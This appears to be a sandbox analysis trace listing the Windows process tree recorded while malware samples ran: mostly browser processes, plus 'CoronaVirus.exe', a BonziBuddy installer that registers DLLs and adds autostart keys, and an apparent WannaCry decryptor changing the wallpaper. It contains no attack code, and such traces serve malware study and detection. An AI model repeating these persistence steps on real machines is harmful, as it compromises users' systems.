"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:5024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=john+cena+midi+legit+not+converted
5⤵
PID:8164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:11332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 1636
5⤵
- Program crash
PID:3428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:1
3⤵
PID:5060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7880 /prefetch:1
3⤵
PID:5392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
3⤵
PID:7312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7720 /prefetch:1
3⤵
PID:11448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:1
3⤵
PID:7424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7912 /prefetch:1
3⤵
PID:11624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2752 /prefetch:1
3⤵
PID:11992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7756 /prefetch:1
3⤵
PID:12104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8152 /prefetch:1
3⤵
PID:6812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:1
3⤵
PID:7600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8488 /prefetch:1
3⤵
PID:9608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7824 /prefetch:1
3⤵
PID:4568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8740 /prefetch:1
3⤵
PID:7944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6412 /prefetch:1
3⤵
PID:7948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
3⤵
PID:8184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8480 /prefetch:1
3⤵
PID:8276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9028 /prefetch:1
3⤵
PID:10084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7972 /prefetch:1
3⤵
PID:9004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:1
3⤵
PID:10188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9116 /prefetch:1
3⤵
PID:3428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8952 /prefetch:1
3⤵
PID:8480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9076 /prefetch:1
3⤵
PID:1880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7456 /prefetch:1
3⤵
PID:616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8356 /prefetch:1
3⤵
PID:3692

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8464 /prefetch:1
3⤵
PID:6984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8520 /prefetch:1
3⤵
PID:7248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8516 /prefetch:1
3⤵
PID:10716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9128 /prefetch:1
3⤵
PID:3628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9136 /prefetch:1
3⤵
PID:12252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8544 /prefetch:1
3⤵
PID:7216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
3⤵
PID:12144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7668 /prefetch:1
3⤵
PID:7416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8380 /prefetch:1
3⤵
PID:9732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
3⤵
PID:9636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8476 /prefetch:1
3⤵
PID:6320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
3⤵
PID:11620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8380 /prefetch:1
3⤵
PID:6496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9512 /prefetch:1
3⤵
PID:5472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8880 /prefetch:1
3⤵
PID:2724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8736 /prefetch:1
3⤵
PID:3716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=9516 /prefetch:8
3⤵
PID:11972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8504 /prefetch:1
3⤵
PID:11648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9904 /prefetch:8
3⤵
PID:11180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6148 /prefetch:8
3⤵
PID:1468

C:\Users\Admin\Downloads\CoronaVirus.exe
"C:\Users\Admin\Downloads\CoronaVirus.exe"
3⤵
PID:8172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 804
4⤵
- Program crash
PID:3640

C:\Users\Admin\Downloads\CoronaVirus.exe
"C:\Users\Admin\Downloads\CoronaVirus.exe"
3⤵
PID:9868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10016 /prefetch:1
3⤵
PID:4684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10344 /prefetch:1
3⤵
PID:10056

C:\Users\Admin\AppData\Local\Temp\Temp1_Bonzi.zip\BonziBuddy432.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Bonzi.zip\BonziBuddy432.exe"
2⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\BonziBuddy432\Runtimes\CheckRuntimes.bat" "
3⤵
PID:880

C:\Program Files (x86)\BonziBuddy432\Runtimes\MSAGENT.EXE
MSAGENT.EXE
4⤵
- Boot or Logon Autostart Execution: Active Setup
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:5912

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentCtl.dll"
5⤵
- Modifies registry class
PID:1476

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentDPv.dll"
5⤵
PID:4948

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\mslwvtts.dll"
5⤵
PID:3372

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentDP2.dll"
5⤵
PID:2456

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentMPx.dll"
5⤵
PID:1628

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentSR.dll"
5⤵
PID:5916

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentPsh.dll"
5⤵
PID:932

C:\Windows\msagent\AgentSvr.exe
"C:\Windows\msagent\AgentSvr.exe" /regserver
5⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5260

C:\Windows\SysWOW64\grpconv.exe
grpconv.exe -o
5⤵
PID:6824

C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe
tv_enua.exe
4⤵
- Boot or Logon Autostart Execution: Active Setup
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:5552

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll
5⤵
PID:5600

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll
5⤵
PID:4412

C:\Windows\SysWOW64\grpconv.exe
grpconv.exe -o
5⤵
PID:3524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://bonzibuddy.tk/
3⤵
PID:4552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
4⤵
PID:928

C:\Program Files (x86)\BonziBuddy432\BonziBDY_35.EXE
"C:\Program Files (x86)\BonziBuddy432\BonziBDY_35.EXE"
2⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6660

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
2⤵
PID:7100

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
3⤵
PID:3228

C:\Users\Admin\Desktop\@[email protected]
"C:\Users\Admin\Desktop\@[email protected]"
2⤵
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Enumerates system info in registry
PID:6784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffb7f38ab58,0x7ffb7f38ab68,0x7ffb7f38ab78
3⤵
PID:6404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1844 --field-trial-handle=1980,i,10797376030118130791,145891646793067415,131072 /prefetch:2
3⤵
PID:1648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1980,i,10797376030118130791,145891646793067415,131072 /prefetch:8
3⤵
PID:4628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1980,i,10797376030118130791,145891646793067415,131072 /prefetch:8
3⤵
PID:232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1980,i,10797376030118130791,145891646793067415,131072 /prefetch:1
3⤵
PID:4068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3172 --field-trial-handle=1980,i,10797376030118130791,145891646793067415,131072 /prefetch:1
3⤵
PID:5260

C:\Program Files\Google\Chrome\Application\chrome.exe
